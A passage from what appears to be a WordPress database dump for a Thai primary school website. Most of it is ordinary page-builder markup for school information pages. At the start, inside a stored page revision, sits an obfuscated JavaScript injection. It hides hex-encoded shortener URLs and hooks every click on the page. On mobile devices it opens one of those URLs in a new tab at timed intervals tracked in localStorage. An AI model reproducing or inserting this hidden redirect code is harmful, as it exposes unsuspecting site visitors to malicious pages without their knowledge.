_0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ข้อมูลพื้นฐาน','','inherit','closed','closed','','650-revision-v1','','','2024-08-07 16:36:43','2024-08-07 09:36:43','',650,'http://pakhaeng.ssk.in.th/?p=653',0,'revision','',0),
(655,1,'2024-08-07 17:21:39','2024-08-07 10:21:39','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"f2a87680\",\"mediaId\":23,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f2a87680\"><img class=\"gb-image gb-image-f2a87680\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/โรงเรียนบ้านโคกสะอาด.png\" alt=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\" title=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=484\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\" data-type=\"page\" data-id=\"650\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=643\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_95f155-a6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_95f155-a6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=609\" data-type=\"page\" data-id=\"609\">ข้อมูลสิ่งก่อสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=605\" data-type=\"page\" data-id=\"605\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?post_type=popupbuilder&amp;p=328\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a 